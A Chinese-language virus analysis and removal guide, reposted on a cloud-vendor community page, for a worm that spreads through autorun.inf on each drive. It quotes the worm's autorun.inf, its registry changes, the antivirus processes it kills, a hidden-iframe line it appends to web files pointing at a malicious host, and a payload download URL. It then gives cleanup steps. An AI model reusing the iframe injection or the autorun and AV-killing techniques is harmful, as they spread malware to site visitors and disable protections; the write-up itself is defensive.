首頁 > 開發者 > Shell

各分區根目錄釋放shell.exe,autorun.inf 的病毒清除方法_病毒查殺

來源:互聯網
上載者:User
創建阿里雲帳戶,並獲得超過 40 款產品的免費試用版;而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊!
病毒名:Trojan-psw.Win32.Magania.os 卡巴
  Worm.Win32.Delf.ysa 瑞星 
  檔案變化: 
  釋放檔案
  C:\WINDOWS\system32\Shell.exe
  C:\WINDOWS\system32\Shell.pci
  C:\pass.dic

  各分區根目錄釋放
  shell.exe
  autorun.inf

  autorun.inf內容
  [Autorun]
  OPEN=Shell.exe
  shellexecute=Shell.exe
  shell\Auto\command=Shell.exe

  修改註冊表:
  建立啟動項目
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
        <Shell.exe><C:\WINDOWS\system32\Shell.exe>
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
為0 
  破壞顯示隱藏檔案
  其他行為

  停止server服務
  尋找SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\密碼防盜專家 綜合版 登錄機碼
  找到則將其刪除

  終止以下進程或關閉視窗
KVXP.KXP
KVMonXP.KXP
RavMon.exe
RavMonClass
TfLockDownMain
ZoneAlarm
ZAFrameWnd
VirusScan
Symantec AntiVirus
Duba
Wrapped gift Killer
IceSword
pjf(ustc)

EGHOST.EXE
PasswordGuard.exe
MAILMON.EXE
KAVPFW.EXE
IPARMOR.EXE
_AVP32.EXE..
_AVPCC.EXE
_AVPM.EXEAVP32.EXE
AVPCC.EXE
AVPM.EXE
AVP.EXE
NAVAPW32.EXE
NAVW32.EXE
nod32kui.exe
nod32kru.exe
PFW.exe
Kfw.exe
KAVPFW.exe
vsmon.exe
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
360Safe.exe
360tray.kxp
FrogAgent.exe
FYFireWall.exe
Rundl132.exe
Logo_1.exe
Logo1_.exe

  遍曆非系統磁碟分割的.ASP .exe .com .pif .exe .ASPX .COM .HTM .HTML .JSP .PHP檔案
感染.ASP
.ASPX
.COM
.HTM
.HTML
.JSP
.PHP
檔案
在其後面加入 <iframe src=http://www.photoyahoo5.com                                           width=0 height=0></iframe>的代碼

  感染.exe .com .pif .exe
  在其頭部加入64516位元組的內容 屬於檔案頭寄生感染

  串連網路下載hXXp://www.photoyahoo5.com/tools/01.exe到C盤根目錄下

  清除方法:
  1.安全模式下:(重啟系統長按F8直到出現提示,然後選擇進入安全模式)

  把下面的 代碼拷入記事本中然後另存新檔1.reg檔案
 Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"



  雙擊1.reg把這個登錄機碼匯入

  雙擊我的電腦,工具,檔案夾選項,查看,單擊選取"顯示隱藏檔案或檔案夾" 並清除"隱藏受保護的作業系統檔案(推薦)"前面的鉤。在提示確定更改時,單擊“是” 然後確定

  然後刪除
 C:\WINDOWS\system32\Shell.exe
C:\WINDOWS\system32\Shell.pci
C:\pass.dic 


  以及各個分區下面的shell.exe
  autorun.inf

  2.刪除病毒啟動項(開始菜單-運行-輸入“msconfig”-啟動-刪除帶Shell的項)
  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<Shell.exe><C:\WINDOWS\system32\Shell.exe>

  3.利用反病毒軟體修複受感染的exe檔案
  4.修複被修改的網頁檔案

本文章原先以中文撰寫並發佈於 aliyun.com,亦設英文版本,僅作資訊用途。本網站不對文章的準確性,完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴,請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡,一經驗證之後,即會刪除該侵權內容。

相關文章
linux在shell中日期格式化(時間格式化)__linux
終於搞懂了shell bash cmd...
從外網訪問使用Padavan韌體的路由器(花生殼DDNS配置教程)
EFI Shell 命令
linux shell中單引號、雙引號、反引號、反斜線的區別
如何在shell指令碼裡使用sftp批量傳送檔案

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

熱門內容

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More